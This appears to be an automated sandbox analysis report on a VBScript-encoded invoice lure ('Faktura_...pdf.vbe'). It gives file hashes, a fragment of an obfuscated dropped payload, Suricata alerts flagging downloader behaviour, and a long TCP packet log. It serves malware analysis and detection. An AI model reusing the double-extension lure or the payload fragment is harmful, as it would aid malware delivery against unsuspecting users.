                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Roaming\Kanalseparationen.Gte

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):414348
                        Entropy (8bit):5.967109984428614
                        Encrypted:false
                        SSDEEP:6144:hbcNGEMWWEdeyRlYcS525DA1GE06njJhADDBhumGJFhIfzSr3ZWvMv1LiDACWiV:hbcN/bde5DMUPADlhwFhIfipWeLA
                        MD5:79BD3FBEF131ECC854054049EDCFF107
                        SHA1:E9ED9087470ED08FB205AFD7A16418877E58889B
                        SHA-256:23FD943F1B414C05E01DC52336058AF7FBB24CCD5AD727CB5489A1F6573FC229
                        SHA-512:6F9252026339711BD298F0D9E4B4AA0BCA02072C0B4B8F8CA5E8F46299A051BACBA15BC2470ABE47022A927879B633D41B5BE995CCE9265A33B5173461F3426B
                        Malicious:false
                        Preview:6wJ4mnEBm7teIRwAcQGb6wKHSANcJARxAZvrAtcDuaNYRvVxAZvrAoqvgfEOMfJfcQGb6wL7X4HxrWm0qnEBm3EBm+sCqgXrAj0rukg8rQpxAZtxAZvrAh2bcQGbMcrrAnTL6wJ7Y4kUC+sCPSXrAoXn0eJxAZvrAt/og8EEcQGbcQGbgfli8Z8AfMrrAkoh6wLLDYtEJATrAphUcQGbicPrAlw/cQGbgcMnXkgAcQGb6wK6S7pkwVescQGb6wJdEIHyYnWwNXEBm3EBm4HyBrTnmXEBm+sCGbvrAo/4cQGb6wJUgHEBm4sMEOsC/BZxAZuJDBNxAZtxAZtC6wJG8nEBm4H6iEcEAHXWcQGbcQGbiVwkDOsC1lFxAZuB7QADAABxAZvrAiNqi1QkCOsC2BLrAk7gi3wkBOsCh5txAZuJ63EBm+sC0/OBw5wAAADrArCh6wKqeVPrAgFOcQGbakDrApqtcQGbievrAito6wIyIseDAAEAAAAgvwBxAZvrAi15gcMAAQAA6wL6oXEBm1NxAZvrArwaietxAZvrArh2ibsEAQAAcQGbcQGbgcMEAQAAcQGb6wIS6lPrAp5IcQGbav9xAZvrAiWVg8IFcQGbcQGbMfZxAZvrAsTuMclxAZtxAZuLGnEBm3EBm0HrAlEO6wLXODkcCnXy6wLzyOsCy85GcQGbcQGbgHwK+7h13OsC6UzrAhzsi0QK/HEBm3EBmynwcQGbcQGb/9LrAgfPcQGbuohHBABxAZtxAZsxwOsCkuXrAj7Qi3wkDOsCGM5xAZuBNAdGwj4Q6wLwFesCRMGDwARxAZtxAZs50HXkcQGbcQGbifvrAqrX6wLXYP/X6wLZA+sC0zjCEQbufgi39c9PY++5PYcP52Zoka87k0AAQ89PCg6ukbe7go/G6/Kby5/B77mXt/X/6IgMyPr2kbfBw6IsQsFyxzOprGqyWCmFpLvSxwNkGDupBsogR/bXAs8+hiyv6ueFDGOt

                        Static File Info

                        General

                        File type:ASCII text, with CRLF line terminators
                        Entropy (8bit):4.86235671518053
                        TrID:
                        • Visual Basic Script (13500/0) 100.00%
                        File name:Faktura_82666410_1361590461#U00b7pdf.vbe
                        File size:76'606 bytes
                        MD5:f1a0355012d13febdfb56ee8d2b38012
                        SHA1:38fb764e45b496b63b7a49713fac2b411cfc524b
                        SHA256:670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b
                        SHA512:5b2b82e2b7fef9f2d1725ee2a13a98c415880abb41e5c7c7d3fedaed67b7b3decc616f5f12ae9231859f01ca56b31fcf16d0da4b90904a740ad8ba8a882b27fa
                        SSDEEP:1536:spE42QeC4Ud8kA8fEXzY+gRj+u6/GgRIHSHMy+eQ74Zf:sprLeyAsEtu6uKAO5f
                        TLSH:CF73083199F426FE4A890AFFE94D861983FD859903D18CACA5BD060D7013C5CA7BF394
                        File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

                        File Icon

                        Icon Hash:68d69b8f86ab9a86

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-30T09:57:38.903941+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449731142.250.185.142443TCP
                        2024-09-30T09:58:20.117429+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.451425142.250.185.142443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 30, 2024 09:57:32.668684006 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:32.668720961 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:32.668798923 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:32.675618887 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:32.675637960 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.334170103 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.334369898 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:33.335720062 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.335891008 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:33.339745045 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:33.339755058 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.340812922 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.355457067 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:33.399403095 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.705070019 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.705164909 CEST44349730142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:33.705231905 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:33.709131002 CEST49730443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:37.888149023 CEST49731443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:37.888278961 CEST44349731142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:37.888452053 CEST49731443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:37.888705015 CEST49731443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:37.888742924 CEST44349731142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:38.518682957 CEST44349731142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:38.521452904 CEST49731443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:38.521496058 CEST44349731142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:38.903888941 CEST44349731142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:38.905188084 CEST44349731142.250.185.142192.168.2.4
                        Sep 30, 2024 09:57:38.905304909 CEST49731443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:38.905586004 CEST49731443192.168.2.4142.250.185.142
                        Sep 30, 2024 09:57:38.906027079 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:38.906063080 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:38.906143904 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:38.906451941 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:38.906460047 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:39.560050011 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:39.560179949 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:39.563306093 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:39.563314915 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:39.563554049 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:39.564512014 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:39.607402086 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.912452936 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.912524939 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:41.918186903 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.918251991 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:41.930757046 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.930824041 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:41.930854082 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.936906099 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.936963081 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:41.936975002 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:41.990430117 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.002851963 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.002929926 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.002979040 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.003012896 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.003022909 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.003032923 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.003071070 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.008091927 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.008148909 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.008157015 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.014200926 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.014275074 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.014282942 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.020477057 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.020534992 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.020541906 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.026683092 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.026736021 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.026741982 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.033055067 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.033107042 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.033113956 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.039288998 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.039485931 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.039491892 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.045192957 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.045269012 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.045277119 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.050915956 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.051011086 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.051018953 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.056797028 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.056989908 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.056997061 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.075004101 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.075023890 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.075125933 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.075135946 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.075208902 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.093580961 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.093636990 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.093667984 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.093696117 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.093723059 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.093750000 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.093750000 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.093761921 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.093830109 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.094224930 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.094496965 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.094553947 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.094559908 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.099035978 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.099104881 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.099112034 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.104497910 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.104572058 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.104578018 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.109461069 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.109546900 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.109554052 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.114459991 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.114542007 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.114547968 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.119098902 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.119255066 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.119263887 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.123754025 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.123956919 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.123963118 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.128417969 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.128542900 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.128550053 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.133101940 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.133251905 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.133259058 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.137787104 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.137855053 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.137861967 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.142360926 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.142504930 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.142517090 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.146800995 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.146855116 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.146862984 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.150898933 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.150945902 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.150995970 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.151005030 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.151134968 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.155064106 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.159020901 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.159049988 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.159085989 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.159094095 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.159195900 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.162846088 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.166631937 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.166660070 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.166721106 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.166733980 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.166780949 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.170202971 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.173702955 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.173865080 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.173892975 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.173902988 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.174063921 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.177340984 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.184042931 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.184070110 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.184092999 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.184104919 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.184189081 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.184192896 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.185369968 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.185431004 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.185436010 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.187576056 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.187633038 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.187638044 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.189697981 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.189729929 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.189764023 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.189769983 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.189857006 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.191818953 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.194739103 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.194762945 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.194828987 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.194839954 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.195038080 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.196324110 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.198268890 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.198410988 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.198467970 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.198474884 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.198542118 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.200515985 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.202801943 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.202828884 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.202852964 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.202860117 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.202923059 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.204999924 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.207087994 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.207113028 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.207165956 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.207173109 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.207241058 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.209981918 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.211353064 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.211381912 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.211410999 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.211419106 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.211464882 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.214442015 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.215615034 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.215639114 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.215667963 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.215675116 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.215787888 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.218976021 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.219557047 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.219667912 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.219753027 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.219764948 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.219841957 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.223951101 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.224004030 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.224035025 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.224081039 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.224100113 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.224235058 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.238779068 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238836050 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238861084 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238890886 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238893986 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.238900900 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238926888 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.238940954 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238962889 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.238980055 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.238984108 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.239026070 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.239031076 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.243552923 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.243577003 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.243660927 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.243668079 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.243952036 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.244570971 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.244615078 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.244649887 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.244673967 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.244698048 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.244710922 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.244728088 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.247457027 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.247489929 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.247515917 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.247519016 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.247526884 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.247555971 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.250605106 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.250633001 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.250660896 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.250670910 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.250675917 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.250720978 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.253621101 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.253655910 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.253669977 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.253669977 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.253679991 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.253715038 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.257585049 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.257611036 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.257697105 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.257704020 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.257843971 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.258511066 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.261228085 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.261255026 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.261281013 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.261329889 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.261329889 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.261337042 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.264666080 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.264692068 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.264713049 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.264776945 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.264784098 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.264857054 CEST49732443192.168.2.4216.58.206.65
                        Sep 30, 2024 09:57:42.278235912 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.278270960 CEST44349732216.58.206.65192.168.2.4
                        Sep 30, 2024 09:57:42.278300047 CEST44349732216.58.206.65192.168.2.4
